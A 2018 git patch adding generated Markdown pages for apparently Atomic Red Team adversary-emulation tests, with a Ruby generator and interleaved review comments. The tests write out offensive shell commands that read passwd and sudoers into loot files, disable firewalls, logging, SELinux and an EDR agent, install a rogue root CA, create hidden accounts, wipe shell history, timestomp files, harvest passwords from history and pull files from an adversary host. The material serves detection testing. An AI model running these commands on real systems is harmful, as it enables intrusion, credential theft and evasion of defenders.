From 92de69a6d551a456ff79eb8e9d52f1d69a55121e Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Thu, 10 May 2018 13:26:34 -0600 Subject: [PATCH] first cut of atomic docs generator --- atomics/atomic_doc_template.md.erb | 33 +++++++++++++ atomics/t1046/t1046.md | 19 +++++++ atomics/t1087/t1087.md | 79 ++++++++++++++++++++++++++++++ atomics/t1089/t1089.md | 75 ++++++++++++++++++++++++++++ atomics/t1099/t1099.md | 62 +++++++++++++++++++++++ atomics/t1105/t1105.md | 48 ++++++++++++++++++ atomics/t1123/t1123.md | 34 +++++++++++++ atomics/t1130/t1130.md | 25 ++++++++++ atomics/t1136/t1136.md | 39 +++++++++++++++ atomics/t1139/t1139.md | 23 +++++++++ atomics/t1146/t1146.md | 78 +++++++++++++++++++++++++++++ atomics/t1148/t1148.md | 22 +++++++++ atomics/t1158/t1158.md | 16 ++++++ atomics/t1176/t1176.md | 50 +++++++++++++++++++ generate_atomic_docs.rb | 40 +++++++++++++++ 15 files changed, 643 insertions(+) create mode 100644 atomics/atomic_doc_template.md.erb create mode 100644 atomics/t1046/t1046.md create mode 100644 atomics/t1087/t1087.md create mode 100644 atomics/t1089/t1089.md create mode 100644 atomics/t1099/t1099.md create mode 100644 atomics/t1105/t1105.md create mode 100644 atomics/t1123/t1123.md create mode 100644 atomics/t1130/t1130.md create mode 100644 atomics/t1136/t1136.md create mode 100644 atomics/t1139/t1139.md create mode 100644 atomics/t1146/t1146.md create mode 100644 atomics/t1148/t1148.md create mode 100644 atomics/t1158/t1158.md create mode 100644 atomics/t1176/t1176.md create mode 100755 generate_atomic_docs.rb diff --git a/atomics/atomic_doc_template.md.erb b/atomics/atomic_doc_template.md.erb new file mode 100644 index 00000000..05404288 --- /dev/null +++ b/atomics/atomic_doc_template.md.erb 
@@ -0,0 +1,33 @@
+# <%= technique['identifier'] %> - <%= technique['name'] -%>
+<%- if technique['identifier'].start_with? 'T' %>
+MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
+<% end -%>
+
+## Atomic Tests
+<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
+
+### Test #<%= test_number+1 %> - <%= test['name'] %>
+<%= test['description'] -%>
+
+**Supported Platforms:** <%= test['supported_platforms'].join(', ') %>
+
+<% if test['input_arguments'].to_a.count > 0 %>
+#### Inputs
+| Name | Description | Type | Default Value |
+|-------------------------------------------|
+<% test['input_arguments'].each do |arg_name, arg_options| -%>
+ | <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
+<% end -%>
+<% end -%>
+
+<%- if test['executor']['name'] == 'manual' -%>
+#### Run it with these steps!
+<%= test['executor']['steps'] %>
+
+<%- else -%>
+#### Run it with `<%= test['executor']['name'] %>`!
+```
+<%= test['executor']['command'] %>
+```
+<%- end -%>
+<%- end -%>
\ No newline at end of file
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md
new file mode 100644
index 00000000..5be2cda7
--- /dev/null
+++ b/atomics/t1046/t1046.md
@@ -0,0 +1,19 @@
+# T1234 - Create Account
+MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
+
+## Atomic Tests
+
+### Test #1 - Scan a bunch of ports to see if they are open
+xxx
+
+**Supported Platforms:** linux, macos
+
+
+#### Run it with `sh`!
+```
+for port in {1..65535};
+do
+ echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
+done
+
+```
diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md
new file mode 100644
index 00000000..db6c3523
--- /dev/null
+++ b/atomics/t1087/t1087.md
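Review bot: The Inputs table the template emits has a four-cell header row but a single-cell separator row (`|-------------------------------------------|`), so Markdown renderers that require the separator to match the header will not render it as a table — the generated t1087.md and t1099.md further down this patch show the problem verbatim; use `|------|-------------|------|---------------|`. The data row on the following line is also indented by one space before its leading `|`, which is inconsistent with the header rows and worth removing. `test['supported_platforms'].join(', ')` and `test['executor']['name']` assume both keys exist on every test; a missing key raises inside `template.result` and the generator script in this patch then records the whole technique as a failure, which may be intended but deserves a note in the template such as `<%# every test must declare supported_platforms and executor.name %>`.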
@@ -0,0 +1,79 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - List all accounts +xxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat /etc/passwd > #{output_file} + +``` + +### Test #2 - View sudoers access +xxx (requires root) + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat /etc/sudoers > #{output_file} + +``` + +### Test #3 - View accounts with UID 0 +xxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +grep 'x:0:' /etc/passwd > #{output_file} + +``` + +### Test #4 - List opened files by user +xxx + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username + +``` + +### Test #5 - Show if a user account has ever logger in remotely +xxx + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +lastlog > #{output_file} + +``` diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md new file mode 100644 index 00000000..27b2f6c2 --- /dev/null +++ b/atomics/t1089/t1089.md 
@@ -0,0 +1,75 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Disable iptables firewall +Disables the iptables firewall + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service iptables stop + chkconfig off iptables + service ip6tables stop + chkconfig off ip6tables +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop firewalld + systemctl disable firewalld +fi + +``` + +### Test #2 - Disable syslog +Disables syslog collection + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service rsyslog stop + chkconfig off rsyslog +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop rsyslog + systemctl disable rsyslog +fi + +``` + +### Test #3 - Disable Cb Response +Disable the Cb Response service + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; +then + service cbdaemon stop + chkconfig off cbdaemon +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; + systemctl stop cbdaemon + systemctl disable cbdaemon +fi + +``` + +### Test #4 - Disable SELinux +Disables SELinux enforcement + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +setenforce 0 + +``` diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md new file mode 100644 index 00000000..90236c39 --- /dev/null +++ b/atomics/t1099/t1099.md 
@@ -0,0 +1,62 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Set a file's access timestamp +Stomps on the access timestamp of a file + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +touch -a -t 197001010000.00 #{target_filename} + +``` + +### Test #2 - Set a file's modification timestamp +Stomps on the modification timestamp of a file + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +touch -m -t 197001010000.00 #{target_filename} + +``` + +### Test #3 - Set a file's creation timestamp +Stomps on the create timestamp of a file + +Setting the creation timestamp requires changing the system clock and reverting. +Sudo or root privileges are required to change date. Use with caution. + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | target_filename | Path of file that we are going to stomp on last access time | Path | | + +#### Run it with `sh`! +``` +NOW=$(date) +date -s "1970-01-01 00:00:00" +touch #{target_filename} +date -s "$NOW" +stat #{target_filename} + +``` diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md new file mode 100644 index 00000000..f2c08d2c --- /dev/null +++ b/atomics/t1105/t1105.md 
@@ -0,0 +1,48 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - xxxx +xxxx + +**Supported Platforms:** linux, macos + + +#### Run it with `bash`! +``` +### TODO: Not sure how to handle commands that need to be run on multiple systems + +# Adversary System Configuration +# Ensure SSH access has been configured for an adversary account +echo "This file transferred by scp" > /tmp/adversary-scp +echo "This file transferred by sftp" > /tmp/adversary-sftp +mkdir /tmp/adversary-rsync +cd /tmp/adversary-rsync +touch a b c d e f g + +# Victim System Configuration +# Ensure SSH access has been configured for a victim account +# Ensure write access for victim account to this directory +mkdir /tmp/victim-files +cd /tmp/victim-files + +# Push files to victim using rsync +rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ + +# Pull files from adversary using rsync +rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ + +# Push files to victim using scp +scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ + +# Pull file from adversary using scp +scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file + +# Push files to victim using sftp +sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' + +# Pull file from adversary using sftp +sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file + +``` diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md new file mode 100644 index 00000000..7d671839 --- /dev/null +++ b/atomics/t1123/t1123.md 
@@ -0,0 +1,34 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - SourceRecorder via Windows command prompt +Create a file called test.wma, with the duration of 30 seconds + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | Path to the recording file being captured | Path | test.wma| + | duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30| + +#### Run it with `command_prompt`! +``` +SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} + +``` + +### Test #2 - PowerShell Cmdlet via Windows command prompt +[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet + +``` diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md new file mode 100644 index 00000000..275f1201 --- /dev/null +++ b/atomics/t1130/t1130.md @@ -0,0 +1,25 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Install root CA on CentOS/RHEL +Creates a root CA with openssl + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +openssl genrsa -out #{key_filename} 4096 +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} + +if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; +then + cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt +else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ]; + cp rootCA.crt /etc/pki/ca-trust/source/anchors/ + update-ca-trust +fi + +``` diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md new file mode 100644 index 00000000..57bddbb2 --- /dev/null +++ b/atomics/t1136/t1136.md 
@@ -0,0 +1,39 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Create a user account on a Linux system +Create a user via useradd + +**Supported Platforms:** linux + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | username | Username of the user to create | String | evil_user| + | comment | Comment to record when creating the user | String | Evil Account| + +#### Run it with `bash`! +``` +useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} + +``` + +### Test #2 - Create a user account on a MacOS system +Creates a user on a MacOS system with dscl + +**Supported Platforms:** macos + + +#### Run it with `bash`! +``` +dscl . -create /Users/#{username} +dscl . -create /Users/#{username} UserShell /bin/bash +dscl . -create /Users/#{username} RealName "#{realname}" +dscl . -create /Users/#{username} UniqueID "1010" +dscl . -create /Users/#{username} PrimaryGroupID 80 +dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} + +``` diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md new file mode 100644 index 00000000..2b6ec279 --- /dev/null +++ b/atomics/t1139/t1139.md 
@@ -0,0 +1,23 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - xxxx +xxxx + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history| + | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| + | output_file | Path where captured results will be placed | Path | ~/loot.txt| + +#### Run it with `sh`! +``` +cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} + +``` diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md new file mode 100644 index 00000000..208aa00f --- /dev/null +++ b/atomics/t1146/t1146.md 
@@ -0,0 +1,78 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Clear Bash history (rm) +Clears bash history via rm + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +rm ~/.bash_history + +``` + +### Test #2 - Clear Bash history (echo) +Clears bash history via rm + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +echo "" > ~/.bash_history + +``` + +### Test #3 - Clear Bash history (cat dev/null) +Clears bash history via cat /dev/null + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +cat /dev/null > ~/.bash_history + +``` + +### Test #4 - Clear Bash history (ln dev/null) +Clears bash history via a symlink to /dev/null + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +ln -sf /dev/null ~/.bash_history + +``` + +### Test #5 - Clear Bash history (truncate) +Clears bash history via truncate + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +truncate -s0 ~/.bash_history + +``` + +### Test #6 - Clear history of a bunch of shells +Clears the history of a bunch of different shell types by setting the history size to zero + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +unset HISTFILE +export HISTFILESIZE=0 +history -c + +``` diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md new file mode 100644 index 00000000..48c436ba --- /dev/null +++ b/atomics/t1148/t1148.md 
@@ -0,0 +1,22 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Disable history collection +Disables history collection in shells + +**Supported Platforms:** linux, macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | evil_command | Command to run after shell history collection is disabled | String | whoami| + +#### Run it with `sh`! +``` +export HISTCONTROL=ignoreboth +ls #{evil_command} + +``` diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md new file mode 100644 index 00000000..5e5febb9 --- /dev/null +++ b/atomics/t1158/t1158.md @@ -0,0 +1,16 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Create a hidden file in a hidden directory +Creates a hidden file inside a hidden directory + +**Supported Platforms:** linux, macos + + +#### Run it with `sh`! +``` +mkdir .hidden-directory +echo "this file is hidden" > .hidden-directory/.hidden-file +``` diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md new file mode 100644 index 00000000..213b43bb --- /dev/null +++ b/atomics/t1176/t1176.md 
@@ -0,0 +1,50 @@ +# T1234 - Create Account +MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234) + +## Atomic Tests + +### Test #1 - Chrome (Developer Mode) +xxx + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to [chrome://extensions](chrome://extensions) and +tick 'Developer Mode'. + +2. Click 'Load unpacked extension...' and navigate to +[Browser_Extension](../t1176/) + +3. Click 'Select' + + + +### Test #2 - Chrome (Chrome Web Store) +xxx + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend +in Chrome + +2. Click 'Add to Chrome' + + + +### Test #3 - Firefox +Create a file called test.wma, with the duration of 30 seconds + +**Supported Platforms:** linux, windows, macos + + +#### Run it with these steps! +1. Navigate to [about:debugging](about:debugging) and +click "Load Temporary Add-on" + +2. Navigate to [manifest.json](./manifest.json) + +3. Then click 'Open' + diff --git a/generate_atomic_docs.rb b/generate_atomic_docs.rb new file mode 100755 index 00000000..20ebaf6a --- /dev/null +++ b/generate_atomic_docs.rb 
@@ -0,0 +1,40 @@
+#! /usr/bin/env ruby
+require 'yaml'
+require 'ostruct'
+require 'erb'
+
+def generate_docs!(path)
+ atomic_yaml = YAML.load(File.read path)
+
+ technique = {
+ # TODO GET FROM MITRE
+ 'identifier' => "T1234",
+ 'name' => "Create Account",
+ }
+
+ template = ERB.new File.read("#{File.dirname(__FILE__)}/atomics/atomic_doc_template.md.erb"), nil, "-"
+ generated_doc = template.result(binding)
+
+ output_doc_path = path.gsub(/.yaml/, '.md')
+ print " => #{output_doc_path} => "
+ File.write output_doc_path, generated_doc
+end
+
+oks = []
+fails = []
+
+Dir["#{File.dirname(__FILE__)}/atomics/t*/t*.yaml"].sort.each do |path|
+ begin
+ print "Generating docs for #{path}"
+ generate_docs! path
+ puts "OK"
+ rescue => ex
+ fails << path
+ puts "FAIL (#{ex} #{ex.backtrace.join("\n")})"
+ end
+end
+
+puts
+puts "Generated docs for #{oks.count} techniques, #{fails.count} failures"
+
+exit fails.count
\ No newline at end of file
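Review bot: `oks` is never appended to, so the closing summary always reports `Generated docs for 0 techniques`; add `oks << path` right after `generate_docs! path` inside the `begin` block. `path.gsub(/.yaml/, '.md')` uses an unescaped `.` and replaces every match anywhere in the path rather than only the trailing extension; `output_doc_path = path.sub(/\.yaml\z/, '.md')` expresses the intent. `YAML.load` will instantiate arbitrary Ruby objects from tags in the atomic YAML files, and the generated docs in this patch suggest those files hold only plain hashes, strings and lists, so `YAML.safe_load(File.read(path))` is the safer choice should the script ever be run over unreviewed contributions. `require 'ostruct'` is unused, and the positional `nil, "-"` trim-mode arguments to `ERB.new` are the form newer Ruby versions deprecate in favour of `trim_mode: '-'`.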